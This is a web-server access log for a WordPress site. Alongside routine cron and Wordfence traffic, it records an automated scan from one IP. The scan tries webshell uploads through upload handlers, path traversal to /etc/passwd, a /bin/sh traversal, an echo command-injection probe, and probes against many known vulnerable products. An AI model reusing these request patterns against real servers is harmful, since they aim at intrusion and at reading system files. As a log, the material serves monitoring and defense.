165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "POST /server/php/UploadHandler.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /server/php/upload.class.php/files/Qrhl8HvU.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "POST /php/index.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /server/php/UploadHandler.php/files/Qrhl8HvU.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "POST /example/upload.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /example/upload.php/files/Qrhl8HvU.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /php/index.php/files/Qrhl8HvU.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (ZZ; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:21:15 +0800] "POST /?wordfence_syncAttackData=1768292475.6363 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768292477.4731590747833251953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:15 +0800] "POST /?wordfence_syncAttackData=1768292475.6372 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:16 +0800] "POST /?wordfence_syncAttackData=1768292476.4352 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:16 +0800] "POST /?wordfence_syncAttackData=1768292476.5136 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:19 +0800] "POST /?wordfence_syncAttackData=1768292479.8105 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:19 +0800] "POST /?wordfence_syncAttackData=1768292479.5849 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:19 +0800] "POST /?wordfence_syncAttackData=1768292479.972 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:23 +0800] "POST /?wordfence_syncAttackData=1768292483.39 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:23 +0800] "POST /?wordfence_syncAttackData=1768292483.1622 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:20 +0800] "POST /?wordfence_syncAttackData=1768292480.2082 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:21:23 +0800] "POST /?wordfence_syncAttackData=1768292483.7152 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:21:26 +0800] "POST /example/upload.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:21:23 +0800] "POST /?wordfence_syncAttackData=1768292483.8253 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:21:26 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:21:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768292490.2371690273284912109375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:21:26 +0800] "GET /php/index.php/files/Qrhl8HvU.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (ZZ; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [13/Jan/2026:16:21:26 +0800] "GET /server/php/UploadHandler.php/files/Qrhl8HvU.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:21:26 +0800] "GET /example/upload.php/files/Qrhl8HvU.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:24:32 +0800] "GET /?echo+wvxGdItvZq HTTP/1.1" 301 - "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:24:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768292676.4544498920440673828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:24:34 +0800] "POST /?wordfence_syncAttackData=1768292674.6047 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:24:32 +0800] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:24:36 +0800] "POST /?wordfence_syncAttackData=1768292676.3379 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:24:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768292688.1311910152435302734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:24:45 +0800] "GET /login HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:25:19 +0800] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:16:26:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768292807.6452310085296630859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:26:44 +0800] "POST /checkValid HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0"
103.4.122.14 - - [13/Jan/2026:16:28:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768292923.6679079532623291015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:28:40 +0800] "POST /apis/authorization.k8s.io/v1/selfsubjectaccessreviews HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:28:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768292935.4667561054229736328125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
84.246.85.11 - - [13/Jan/2026:16:28:54 +0800] "GET / HTTP/1.1" 301 - "-" "2ip bot/1.1 (+https://2ip.io)"
84.246.85.11 - - [13/Jan/2026:16:28:57 +0800] "GET / HTTP/1.1" 200 16720 "http://nutritaste.com.au" "2ip bot/1.1 (+https://2ip.io)"
103.4.122.14 - - [13/Jan/2026:16:29:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768292940.1433250904083251953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
84.246.85.11 - - [13/Jan/2026:16:28:58 +0800] "GET / HTTP/1.1" 301 - "-" "2ip bot/1.1 (+https://2ip.io)"
84.246.85.11 - - [13/Jan/2026:16:29:01 +0800] "GET / HTTP/1.1" 200 16720 "http://nutritaste.com.au" "2ip bot/1.1 (+https://2ip.io)"
103.4.122.14 - - [13/Jan/2026:16:29:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768292944.5833959579467773437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
84.246.85.11 - - [13/Jan/2026:16:29:03 +0800] "GET / HTTP/1.1" 301 - "-" "2ip bot/1.1 (+https://2ip.io)"
84.246.85.11 - - [13/Jan/2026:16:29:05 +0800] "GET / HTTP/1.1" 200 16720 "http://nutritaste.com.au" "2ip bot/1.1 (+https://2ip.io)"
103.4.122.14 - - [13/Jan/2026:16:30:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768293025.7875099182128906250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:30:22 +0800] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:33:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768293225.7715179920196533203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:33:42 +0800] "POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:36:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768293391.6221010684967041015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:36:28 +0800] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:36:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768293397.2444279193878173828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:36:34 +0800] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
165.232.54.158 - - [13/Jan/2026:16:37:12 +0800] "POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:37:15 +0800] "GET /wp-login.php HTTP/1.1" 200 3205 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:37:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768293439.0579659938812255859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:37:17 +0800] "POST /?wordfence_syncAttackData=1768293437.4898 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:37:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768293451.3782029151916503906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:37:28 +0800] "GET /wan.htm HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:16:38:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768293480.2272970676422119140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:37:57 +0800] "GET /login HTTP/1.1" 302 - "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [13/Jan/2026:16:38:00 +0800] "GET /login HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
103.4.122.14 - - [13/Jan/2026:16:38:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768293486.4723579883575439453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:38:03 +0800] "POST /Collector/diagnostics/ping HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:38:06 +0800] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
103.4.122.14 - - [13/Jan/2026:16:39:33 +0800] "POST /wp-cron.php?doing_wp_cron=1768293572.9864940643310546875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
5.161.255.166 - - [13/Jan/2026:16:39:29 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0"
165.232.54.158 - - [13/Jan/2026:16:40:52 +0800] "POST /password_change.cgi HTTP/1.1" 403 199 "https://nutritaste.com.au" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:40:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768293654.2819440364837646484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:40:51 +0800] "GET /index.php/Index/index HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:40:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768293659.2602620124816894531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:40:57 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:42:10 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:42:08 +0800] "POST /session_login.cgi HTTP/1.1" 404 10872 "https://nutritaste.com.au" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:16:42:08 +0800] "POST /rpc.cgi HTTP/1.1" 404 10868 "https://nutritaste.com.au/sysinfo.cgi?xnavigation=1" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:42:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768293731.6851029396057128906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:42:08 +0800] "POST /session_login.cgi HTTP/1.1" 404 10872 "https://nutritaste.com.au" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:42:08 +0800] "POST /rpc.cgi HTTP/1.1" 404 10868 "https://nutritaste.com.au/sysinfo.cgi?xnavigation=1" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:16:42:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768293746.2362120151519775390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:42:23 +0800] "GET /cgi-bin/protected/main.cgi HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:16:43:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768293785.6367149353027343750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:43:02 +0800] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:43:03 +0800] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/108.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:48:03 +0800] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:16:48:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768294122.6693439483642578125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:48:29 +0800] "GET /login HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:48:42 +0800] "POST /?wordfence_syncAttackData=1768294122.9187 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:48:41 +0800] "GET /login HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:48:42 +0800] "GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (SS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:16:48:43 +0800] "POST /?wordfence_syncAttackData=1768294123.4722 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:48:48 +0800] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:48:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768294134.6191310882568359375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:48:53 +0800] "POST /?wordfence_syncAttackData=1768294133.1942 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:48:51 +0800] "GET /talari/app/files/38Btk6cBfTeWCGvODOU2bpSg5gu HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
167.71.69.4 - - [13/Jan/2026:16:48:54 +0800] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
103.4.122.14 - - [13/Jan/2026:16:48:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768294138.1238789558410644531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
167.71.69.4 - - [13/Jan/2026:16:48:56 +0800] "GET /wp-login.php HTTP/1.1" 200 3205 "-" "Mozilla/5.0"
167.71.69.4 - - [13/Jan/2026:16:48:58 +0800] "GET /?author=1 HTTP/1.1" 302 - "-" "Mozilla/5.0"
103.4.122.14 - - [13/Jan/2026:16:49:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768294141.6168489456176757812500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
167.71.69.4 - - [13/Jan/2026:16:49:00 +0800] "GET /?feed=rss2 HTTP/1.1" 301 - "-" "Mozilla/5.0"
167.71.69.4 - - [13/Jan/2026:16:49:02 +0800] "GET /feed/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
165.232.54.158 - - [13/Jan/2026:16:52:39 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063"
165.232.54.158 - - [13/Jan/2026:16:52:39 +0800] "GET /zabbix/zabbix.php HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:16:52:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768294362.7293219566345214843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:52:39 +0800] "GET /zabbix.php HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:52:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768294374.1249020099639892578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:52:51 +0800] "POST /wp-admin/admin.php?page=EWD-UFAQ-Options&DisplayPage=ImportPosts&Action=EWD_UFAQ_ImportFaqsFromSpreadsheet HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
103.4.122.14 - - [13/Jan/2026:16:52:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768294379.0304660797119140625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:52:56 +0800] "GET /wp-admin/admin.php?Action=EWD_UFAQ_ExportToSpreadsheet HTTP/1.1" 302 - "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:54:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768294448.6247758865356445312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:54:05 +0800] "POST /getcfg.php HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:54:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768294454.2557950019836425781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:54:11 +0800] "POST /artifactory/ui/auth/login HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:54:11 +0800] "POST /ui/auth/login HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/119.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:55:45 +0800] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/127.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:55:59 +0800] "GET /38Btk5W5Tr0nCfrXrWeKgNiMgBZ/../../ThinVnc.ini HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:56:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768294567.7603058815002441406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:56:04 +0800] "POST /apply_sec.cgi HTTP/1.1" 404 10889 "https://nutritaste.com.au" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:56:10 +0800] "POST /apply_sec.cgi HTTP/1.1" 403 199 "https://nutritaste.com.au/login_pic.asp" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:56:15 +0800] "POST /com.example.TestService HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:56:16 +0800] "POST /wp-cron.php?doing_wp_cron=1768294576.3161458969116210937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:56:13 +0800] "POST /apply_sec.cgi HTTP/1.1" 404 10887 "https://nutritaste.com.au/login_pic.asp" "Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
